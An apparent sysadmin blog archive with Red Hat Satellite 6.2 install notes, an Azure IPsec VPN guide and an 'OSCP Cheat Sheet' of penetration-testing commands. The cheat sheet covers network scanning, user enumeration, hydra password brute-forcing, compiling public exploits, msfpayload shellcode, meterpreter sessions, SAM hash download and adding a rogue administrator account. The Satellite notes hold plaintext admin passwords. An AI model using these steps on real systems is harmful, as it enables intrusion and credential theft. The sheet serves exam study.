Thursday, February 16, 2017

INSTALLING RED HAT SATELLITE SERVER 6.2 Rough notes

1) Enabled the following repos:
subscription-manager repos --enable=rhel-7-server-rpms --enable=rhel-7-server-optional-rpms --enable=rhel-7-server-satellite-6.2-rpms --enable=rhel-server-rhscl-7-rpms










STEPS:
1) Take a snapshot
2) IP
3) DNS
4) Proxy configurations
5) snapshot
6) scripted install
7) If it works fine then OK, otherwise do a step-by-step install
8) create check points for better installation




hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --releasever='7Server' --name 'Red Hat Enterprise Linux 7 Server (RPMs)'

#hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --releasever='7Server' --name 'Red Hat Enterprise Linux 7 Server (Kickstart)'
#hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --name 'Red Hat Satellite Tools 6.2 (for RHEL 7 Server) (RPMs)'

#hammer repository-set enable --organization "Smart" --product 'Red Hat Enterprise Linux Server' --basearch='x86_64' --name 'Red Hat Enterprise Linux 7 Server - RH Common RPMs x86_64 7Server'


hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Enterprise Linux 7 Server Kickstart x86_64 7Server'
hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Satellite Tools 6.2 for RHEL 7 Server RPMs x86_64'
hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Enterprise Linux 7 Server RPMs x86_64 7Server'
hammer repository synchronize --async --organization "Smart" --product 'Red Hat Enterprise Linux Server'  --name 'Red Hat Enterprise Linux 7 Server - RH Common RPMs x86_64 7Server'



hammer content-view create --organization "Smart" --name 'RHEL7_Base' --label rhel7_base --description 'Core Build for RHEL 7'

#hammer content-view add-repository --organization "Smart" --name 'RHEL7_Base' --product 'Red Hat Enterprise Linux Server' --repository 'Red Hat Enterprise Linux 7 Server RPMs x86_64 7Server'
#hammer content-view add-repository --organization "Default Organization" --name 'RHEL7_base' --product 'Red Hat Enterprise Linux Server' --repository 'Red Hat Satellite Tools 6.2 for RHEL 7 Server RPMs x86_64'

#hammer content-view add-repository --organization "Default Organization" --name 'RHEL7_base' --product 'Red Hat Enterprise Linux Server' --repository 'Red Hat Enterprise Linux 7 Server - RH Common RPMs x86_64 7Server'

#hammer content-view add-repository --organization "Default Organization" --name 'RHEL7_base' --product 'EPEL 3rd Party Packages'  --repository  'EPEL 7 - x86_64'







hammer lifecycle-environment create --organization "Smart" --description 'Development' --name 'DEV' --label development --prior Library
hammer lifecycle-environment create --organization "Smart" --description 'Production' --name 'PROD' --label production --prior 'DEV'



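# hammer reads the admin credentials from this file in plaintext; keep it readable by its owner only (mode 0600)
cat > .hammer/cli_config.yml <<EOF
:foreman:
    :host: 'https://localhost/'
    :username: 'admin'
    :password: 'redhat'
EOF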


------------------

try

yum update java

hostnamectl set-hostname sp1lvlxset02.sdp
echo 172.28.68.47 sp1lvlxset02.sdp sp1lvlxset02 >> /etc/hosts

vi /etc/hosts
ping sp1lvlxset02
facter fqdn
hostname
hostname -f
ping -c1 localhost
ping -c1 `hostname -s`
ping -c1 `hostname -f`
cp /etc/httpd/conf.modules.d/xsendfile.conf  /etc/httpd/conf.d/
ll /etc/httpd/conf.d/xsendfile.conf
ll /etc/httpd/conf.modules.d/xsendfile.conf
systemctl restart httpd
ls -l /usr/share/tomcat/conf/keystore
ll /etc/candlepin/certs/keystore
rpm -qa | grep java

satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent --verbose --katello-proxy-url=http://proxy.server --katello-proxy-port=8080




hostnamectl set-hostname sp1lvlxset02.sdp
hostname -f
facter fqdn
vi /etc/hosts
----

In case of a static IP address with no DNS, ensure /etc/hosts contains the FQDN hostname in the first position, for example:

192.168.1.1 satellite.example.com
-------
Note that if changing the hostname at this stage of deployment, first ensure that you can successfully run these pings:
ping -c1 localhost
ping -c1 `hostname -s` # my_system
ping -c1 `hostname -f` # my_system.domain.com
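
The /etc/hosts requirement above (FQDN in the first position) can be checked before the installer is run. This is an added example, not part of the original notes or of any Red Hat tooling; the function name and its exit codes are assumptions, and the sample files are constructed from the host name and address used in these notes.

```bash
#!/bin/sh
# hosts_fqdn_status FILE FQDN
#   0  the first line that mentions FQDN lists it as the first name
#   1  the first line that mentions FQDN lists it only as a later alias
#   2  FQDN does not appear in FILE
# A files-based lookup uses the first line that mentions the name, and the
# first name on that line is what `hostname -f` reports.
hosts_fqdn_status() {
    local file="$1" fqdn="$2" line name
    while IFS= read -r line || [ -n "$line" ]; do
        set -f                  # no globbing while the line is word-split
        set -- ${line%%#*}      # drop comments; $1 = address, $2.. = names
        set +f
        [ "$#" -ge 2 ] || continue
        [ "$2" = "$fqdn" ] && return 0
        shift 2
        for name in "$@"; do
            [ "$name" = "$fqdn" ] && return 1
        done
    done <"$file"
    return 2
}

# Demo on constructed files: the first uses the layout from the notes,
# the second puts the short name first.
good=$(mktemp)
bad=$(mktemp)
printf '%s\n' '127.0.0.1 localhost' \
              '172.28.68.47 sp1lvlxset02.sdp sp1lvlxset02' >"$good"
printf '%s\n' '127.0.0.1 localhost' \
              '172.28.68.47 sp1lvlxset02 sp1lvlxset02.sdp' >"$bad"
for f in "$good" "$bad"; do
    rc=0
    hosts_fqdn_status "$f" sp1lvlxset02.sdp || rc=$?
    echo "hosts check status: $rc"
done
rm -f "$good" "$bad"
```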

cp /etc/httpd/conf.modules.d/xsendfile.conf  /etc/httpd/conf.d/
Attempt to restart httpd:

systemctl restart httpd
--------------

Confirm ownership and permissions of the files below. Correct them as needed.
# ls -l /usr/share/tomcat/conf/keystore
lrwxrwxrwx. 1 tomcat foreman 25 Sep 11 18:12 /usr/share/tomcat/conf/keystore -> /etc/pki/katello/keystore

# ls -l /etc/pki/katello/keystore
-rw-r--r--. 1 root root 2954 Sep 11 18:12 /etc/pki/katello/keystore

# ls -l /etc/foreman-proxy/ssl_cert.pem
-rw-r--r--. 1 root root 5579 Sep 11 18:11 /etc/foreman-proxy/ssl_cert.pem

---------------------------




satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent  --verbose


satellite-installer --scenario satellite --upgrade --verbose


------------------------JAVA VERSION-----------
Workaround

Run:

# rpm -e java-1.8.0-openjdk-headless-1.8.0.45-28.b13.el6_6.x86_64 java-1.8.0-openjdk-1.8.0.45-28.b13.el6_6.x86_64
# yum -y install java-1.7.0-openjdk
# alternatives --config java
Then pick the number next to 1.7.0 and re-run the installer.
Root Cause

The default version of java installed with RHEL 6.6 does not work with Red Hat Satellite 6.
Diagnostic Steps

Check the version of java installed and verify it's not 1.8:

# rpm -qa | grep java


------------

Resolution

To fix this issue, run the commands below:
# foreman-rake console
irb(main):001:0> Host.find_by_name("client1.example.com").interfaces=[]
Re-run the same upgrade command again to complete the satellite upgrade process.
Root Cause

From the output of Host.find_by_name, it seems that the network interface assigned to the host has its subnet set as blank.
irb(main):002:0> Nic::Managed.where(:host_id => Host.find_by_name('client1.example.com'), :primary => true, :provision => true)
=> #]>
irb(main):003:0>
----------





katello-installer --katello-proxy-url=http://myproxy.example.com --katello-proxy-port=8080 --katello-proxy-username=proxy_username --katello-proxy-password=proxy_password
facter fqdn
'hostname -f
hostname -f
hostnamectl set-hostname SP1LVLXSET02.sdp
hostname -f
facter fqdn


Resolution

Change the specified proxy username to one that does not include the domain or '\' special character.
Note: Prior to re-running the Satellite installer, ensure that any bash proxy definitions are cleared:

# export http_proxy=""
# export https_proxy=$http_proxy
# export no_proxy=$http_proxy



[root@sp1lvlxset02 ~]#  satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent
Installing             --- /etc/foreman-proxy/settings.d/pulpnode.ymlens201 [99%] [.................................................................................................................  /Stage[main]/Foreman::Database/Foreman::Rake[db:seed]/Exec[foreman-rake-db:seed]: Failed to call refresh: /usr/sbin/foreman-rake db:seed returned 1 instead of one of [0]
 /Stage[main]/Foreman::Database/Foreman::Rake[db:seed]/Exec[foreman-rake-db:seed]: /usr/sbin/foreman-rake db:seed returned 1 instead of one of [0]
 /Stage[main]/Foreman_proxy::Register/Foreman_smartproxy[sp1lvlxset02.sdp]: Could not evaluate: Proxy sp1lvlxset02.sdp cannot be registered (Could not load data from https://sp1lvlxset02.sdp.smart.ae
 /Stage[main]/Foreman_proxy::Register/Foreman_smartproxy[sp1lvlxset02.sdp]: Failed to call refresh: Proxy sp1lvlxset02.sdp.smart.ae cannot be registered (Could not load data from https://sp1lvlxset02.sdp.smart.ae
 /Stage[main]/Foreman_proxy::Register/Foreman_smartproxy[sp1lvlxset02.sdp]: Proxy sp1lvlxset02.sdp.smart.ae cannot be registered (Could not load data from https://sp1lvlxset02.sdp.smart.ae
Installing             Done                                               [100%] [.................................................................................................................]
  Something went wrong! Check the log for ERROR-level output
  The full log is at /var/log/foreman-installer/satellite.log




grep -r SP1LVLXSET02 /
grep -r SP1LVLXSET02 / 2> /dev/null
facter fqdn
vi /root/.hammer/cli_config.yml
facter fqdn
hostname -f
grep -r SP1LVLXSET02 / 2> /dev/null
yum -y install satellite foreman-proxy
hostname set-hostname sp1lvlxset02.sdp
hostnamectl set-hostname sp1lvlxset02.sdp
hostname
echo $HOSTNAME
cat .bash_profile
cat /.bashrc
cat ~/.bashrc
cat /etc/bashrc
cat /etc/bashrc|grep -i host
echo $HOSTNAME
reboot
history
satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent
cat /etc/hosts
echo 172.28.68.47 sp1lvlxset02.sdp  sp1lvlxset02 >> /etc/hosts
vi /etc/hosts
ip r s
satellite-installer --scenario satellite --foreman-initial-organization "Smart" --foreman-initial-location "SDP_MEYDAN_DC" --foreman-admin-username admin --foreman-admin-password HP1nvent
history

--------------







Sunday, February 12, 2017

How to disable password aging for a user account



chage -m 0 -M 99999 -I -1 -E -1 lxuser1

[root@sp1lvlxbpm01 ~]# chage -l lxuser1
Last password change                                    : Feb 13, 2017
Password expires                                        : never
Password inactive                                       : never
Account expires                                         : never
Minimum number of days between password change          : 0
Maximum number of days between password change          : 99999

Number of days of warning before password expires       : 7


http://www.thegeekstuff.com/2009/04/chage-linux-password-expiration-and-aging/
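
The chage call above changes the aging fields of the account's /etc/shadow entry (field 5 is the maximum age, 7 the inactivity period, 8 the account expiry), so accounts exempted this way can be listed from that file. This is an added example, not part of the original post; the function name, the 365-day default and the sample entries (with placeholder hashes) are assumptions constructed for illustration.

```bash
#!/bin/sh
# aging_report SHADOW_FILE [MAX_DAYS]
# Prints one line per account that can log in with a password and whose
# maximum password age is unset or larger than MAX_DAYS (default 365).
aging_report() {
    awk -F: -v limit="${2:-365}" '
        # chage -l prints "never" for an empty or negative field
        function shown(v) { return (v == "" || v + 0 < 0) ? "never" : v }
        $2 ~ /^[!*]/ { next }            # locked account or no password login
        $5 == "" || $5 + 0 > limit + 0 {
            printf "%s max=%s inactive=%s expire=%s\n",
                   $1, shown($5), shown($7), shown($8)
        }
    ' "$1"
}

# Demo on a constructed shadow file (placeholder hashes, not real ones).
sample=$(mktemp)
cat >"$sample" <<'EOF'
root:$6$constructed$hash:17210:0:99999:7:::
lxuser1:$6$constructed$hash:17210:0:99999:7:::
appuser:$6$constructed$hash:17210:1:90:7:30::
daemon:*:17000:0:99999:7:::
svc:!!:17000:0:99999:7:::
EOF
aging_report "$sample"        # root and lxuser1: aging effectively disabled
aging_report "$sample" 60     # additionally reports appuser (max=90)
rm -f "$sample"
```

On a live system the function is run as root against /etc/shadow.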

Tuesday, November 22, 2016

BareOS Backup - Opensource backup

http://doc.bareos.org/master/html/bareos-manual-main-reference.html

Wednesday, October 26, 2016

How to Configure a Site-to-Site IPsec VPN to the Microsoft Azure VPN Gateway


You can configure your Barracuda NextGen Firewall X-Series to connect to the IPsec VPN gateway service in the Microsoft Azure cloud.

Before you Begin

  • Create and configure a Microsoft Azure static VPN Gateway for your virtual network.
  • You will need the following information:
    • VPN Gateway
    • External IP address for the X-Series Firewall
    • Remote and local networks.

Step 1. Create a Network in the Microsoft Azure cloud

Create a virtual network in the Microsoft Azure cloud. Choose subnets which are not present in your local networks to avoid IP address conflicts.
  1. Log into your Microsoft Azure Management Portal (https://manage.windowsazure.com).
  2. In the left pane click NETWORKS.
  3. In the bottom left corner click + NEW.
  4. Click CUSTOM CREATE. The create a virtual network window opens.
  5. Enter the Name for the network.
  6. Select a Location. E.g., West Europe
  7. Click NEXT.
  8. (optional) Enter or select a DNS server.
  9. In the right panel enable Configure site-to-site VPN.
  10. Select Specify a New Local Network from the LOCAL NETWORK drop down.
  11. Click Next.
  12. Enter a NAME for your local on-premises network.
  13. Enter the VPN DEVICE IP ADDRESS. This is the external IP address of the X-Series Firewall running the VPN service.
  14. In the ADDRESS SPACE section enter the on-premise network(s). E.g., 10.10.200.0/24
  15. Click Next.
  16. In the Virtual Network Address Spaces section click add subnet:
    • Subnet – Enter a name for the subnet.
    • Starting IP – Enter the first IP of the IP Range for the subnet. E.g., 10.10.201.0
    • CIDR (ADDRESS COUNT) – Select the subnet mask from the list. E.g., /24 for 256 IP addresses
  17. Click add gateway subnet:
    • Starting IP – Enter the first IP for the gateway subnet. E.g., 10.10.201.0
    • CIDR (ADDRESS COUNT) – Select the subnet mask from the list. E.g., /29 for 8 IP addresses
  18. Click OK.
The Azure Virtual Network you have just created is now listed in the NETWORK menu in the Azure management interface.
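
Step 1 asks for Azure subnets that are not present in the local networks. The check below is an added example, not part of the Barracuda article; the function names are assumptions, and the sample networks are the article's example values plus one constructed /16. It tests whether two IPv4 CIDR blocks share any address before they are entered as the local network and the Azure subnet.

```bash
#!/bin/sh
# ip_to_int A.B.C.D -> prints the address as a 32-bit integer
ip_to_int() {
    local IFS=.
    set -- $1
    echo $(( ($1 << 24) + ($2 << 16) + ($3 << 8) + $4 ))
}

# cidr_range NET/LEN -> prints "first last" (integers) of the block
cidr_range() {
    local net="${1%/*}" len="${1#*/}" base size
    base=$(ip_to_int "$net")
    size=$(( 1 << (32 - $len) ))
    base=$(( $base / $size * $size ))      # align to the prefix boundary
    echo "$base $(( $base + $size - 1 ))"
}

# cidr_overlap CIDR_A CIDR_B -> returns 0 when the blocks share addresses
cidr_overlap() {
    local a b
    a=$(cidr_range "$1")
    b=$(cidr_range "$2")
    set -- $a $b                           # $1 $2 = range A, $3 $4 = range B
    [ "$1" -le "$4" ] && [ "$3" -le "$2" ]
}

# Demo: the article's on-premises network against its Azure subnet, then
# against a constructed /16 that would swallow the on-premises range.
for remote in 10.10.201.0/24 10.10.0.0/16; do
    if cidr_overlap 10.10.200.0/24 "$remote"; then
        echo "10.10.200.0/24 conflicts with $remote"
    else
        echo "10.10.200.0/24 and $remote are disjoint"
    fi
done
```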

Step 2. Create a VPN Gateway for the Microsoft Azure Network

Create the Azure VPN Gateway.
  1. Log into your Microsoft Azure Management Portal (https://manage.windowsazure.com).
  2. In the left pane click NETWORKS.
  3. Click on the Network previously created in Step 1.
  4. In the top menu click on DASHBOARD.
  5. In the bottom pane, click CREATE GATEWAY.
  6. Select Static Routing from the list. Creating the gateway will take a couple of minutes.
When the color of the gateway turns blue, the gateway has been successfully created. The Gateway IP is now displayed below the VPN Gateway image.

Step 3. Configure IPsec Site-to-Site VPN on the X-Series Firewall

Create an active IPsec VPN connection on the X-Series Firewall.
  1. Go to the Site-to-Site page (VPN > Site-to-Site).
  2. If you are using a dynamic address (DHCP, xDSL, 3G) to connect to the Internet, or if you are behind a NAT, enable Use Dynamic IPs in the GLOBAL SERVER SETTINGS section and click Save. The VPN service restarts.
  3. In the Site-to-Site IPsec Tunnels section click on Add.
  4. Enter the Name for the IPsec VPN. E.g., AzureVPNGateway
  5. Configure the Phase 1 and Phase 2 encryption settings:
    • Phase 1:
      • Encryption – AES
      • Hash Method – SHA
      • DH Group – Group 2
      • Lifetime – 28800
    • Phase 2:
      • Encryption – AES
      • Hash Method – SHA256
      • Lifetime – 3600
      • Perfect Forward Secrecy – No
    • Local End – Active
    • Local Address – Dynamic or static if you are using a static WAN connection.
    • Local Networks – Enter your on-premise subnet(s). E.g.,
    • Remote Gateway – Enter the IP for the GATEWAY IP ADDRESS listed on the DASHBOARD of your Azure network. E.g., 137.117.203.108
    • Remote Networks – Enter the remote VPC subnet. E.g., 10.10.201.0/24
    • Authentication – Select Shared Passphrase.
    • Passphrase – Enter the Shared Key generated by your Azure VPN Gateway. To view the shared key go to the DASHBOARD of your Azure network and click on the Manage Key icon in the bottom pane.
    • Enable Aggressive – No
  6. Click Save.

Step 4. Create an Access Rule

If you do not have the VPN-SITE-2-SITE access rule, you must create an access rule to allow traffic from your local network to the Azure subnet.
  1. Go to the FIREWALL > Firewall Rules page.
  2. Add an Access Rule:
    • Type – Select ALLOW.
    • Source – Enter your local network(s) or select a network object containing only your local network(s). E.g., 10.10.200.0/24
    • Destination – Enter the remote subnet in the Azure Network. E.g., 10.10.201.0/24
    • Network Services – Select Any.
    • Connection – Select No SNAT
  3. Click Save.
  4. Place the firewall rule so no rule matches the VPN traffic above it.
  5. Click Save.
Your X-Series Firewall will now automatically connect to the Azure VPN Gateway.


Reference: https://campus.barracuda.com/product/nextgenfirewallx/article/NGX/ConfigAzureVPNGateway/

cloned appliance VM mac issue

Sometimes it's necessary to use the last used MAC address for the clone in order to get it to work.

CFME console access via ssh connection

[root@cfme01 ~]# LOCK_CONSOLE=false /bin/appliance_console

Friday, October 7, 2016

OSCP Cheat Sheet

Scan network for live hosts (nmap/zenmap)
For NMAP –



nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt
cat hosts_up.txt | grep -i "up"






nmap -PN 192.168.9.200-254

(this will also show open ports for each host)








Identify OS (nmap/zenmap)
For NMAP –


nmap -O 192.168.0.100 (just OS fingerprint)



nmap -A 192.168.9.201 (runs an "aggressive" scan – scan, OS fingerprint, version scan, scripts and traceroute)


Check hosts for services (nmap/zenmap)
For NMAP

- nmap -sS 192.168.9.254 (TCP)

- nmap -sU 192.168.9.254 (UDP)

(Could be better to do this in zenmap and group servers by services)



FOR SNMP

- snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d" " -f



For a known port

- nmap -p 139 192.168.9.254





DNS Lookups/Hostnames



host -l

e.g. host -l acme.local 192.168.0.220








Banner grab/Version services
(nmap/zenmap/SNMP)

(Check versions of software/services against milw0rm and SecurityFocus)





For NMAP

- nmap -sV 192.168.9.254








For SNMP

snmpenum -t 192.168.0.100 (displays all snmp informations for that server)





For SMTP

nc -v 25

Will give mailserver version. Can also VRFY to find valid usernames/email accounts





Netbios/SMB

smb4k (graphical interface – lists shares)



smbserverscan
metasploit auxiliary scanner

./msfconsole show
use scanner/smb/version

set RHOSTS 192.168.0.1-192.168.0.254

run








Enumerate Usernames (SNMP/SMTP/SMB[NETBIOS]/Add others here)


For SMB

nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)
(on my machine /root/offsec)
./samrdump.py 192.168.9.201 (results from above)


For SNMP

nmap -sT -p 161 192.168.9.200-254 -oG snmp_results.txt (then grep)

- snmpwalk -c public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d" " -f4



For SMTP – (/pentest/enumeration/vrfy)

./smtp_VRFY.py

** NEED TO MAKE THREADED – VERY SLOW **


SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

- ./samrdump.py SNMP server



*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***

*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***










Crack Passwords (hydra/THC bruter)
(need mil-dict.txt from milw0rm – cracked hashes)



FTP – hydra -l -P mil-dict.txt -f ftp -V



POP3 – hydra -l -P mil-dict.txt -f pop3 -V (may need to use -t 15 to limit concurrent connections)



SNMP – hydra -P mil-dict.txt -f -V



MS VPN –
dos2unix words (whatever word list)
cat words | thc-pptp-bruter VPN server


Look for known vulnerable services (refer nmap/zenmap output)
Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com







Compile exploit code if possible (milw0rm archive)

cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers.
cat exploit | grep "#include"



Windows: process.h, string.h, winbase.h, windows.h, winsock2.h

Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h



Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u



LINUX









gcc -o dcom 66.c

./dcom






WINDOWS
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe ability.c -lwsock32
wine ability.exe (to run compiled file)





Wireshark Filters


To filter out all traffic for IP 192.168.0.100

!(ip.addr == 192.168.0.100)





FUZZING STEPS – ASH STYLE

1. Determine target application and operating system
2. Obtain a copy of the application
3. Analyse the RFC & communication protocols
4. Discover & record crash conditions
5. Analyse crash conditions for exploitation opportunities

Things we need to know
Which 4 bytes overwrite EIP
Do we have enough space in buffer for shellcode
Is this shellcode easily accessible in memory
Does the application filter out any characters
Will we encounter overflow protection mechanisms

(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***)

Creating pattern for EIP location
framework3/tools -> pattern_create.rb >> Fuzzing_script (will append to the end of the script)
then look in ollydbg for pattern (need to reverse it and convert)

pattern_offset.rb
will show byte offset

Creating shellcode (in framework3)
./msfpayload |grep -i shell

./msfpayload …… o (for options)
./msfpayload …… c (to create)
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **
CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)

Finding an exploit
/pentest/exploits/milw0rm
grep sploitlist.txt


MSFCLI (p243)
./msfcli
-o options
-p payloads
-t test
-e exploit

MSFCONSOLE
sessions -l => list created sessions
sessions -i # => interact with specific session number
show options
search

use exploit/ …..
set PAYLOAD ….

exploit


Meterpreter Payloads (p260)
payload = windows/meterpreter/reverse_tcp ….
meterpreter> help (lists all commands)
upload c:\\windows

download c:\\windows\\repair\\sam /tmp
ps (running tasks)
execute -f cmd -c (creates a new channel with the cmd shell)
interact # (interacts with channel)


Other useful windows commands
net user ash my_password /add
net localgroup administrators ash /add


Passwords & Hashes
Windows SAM => %systemroot%\Repair (pwdump or fgdump – p340)




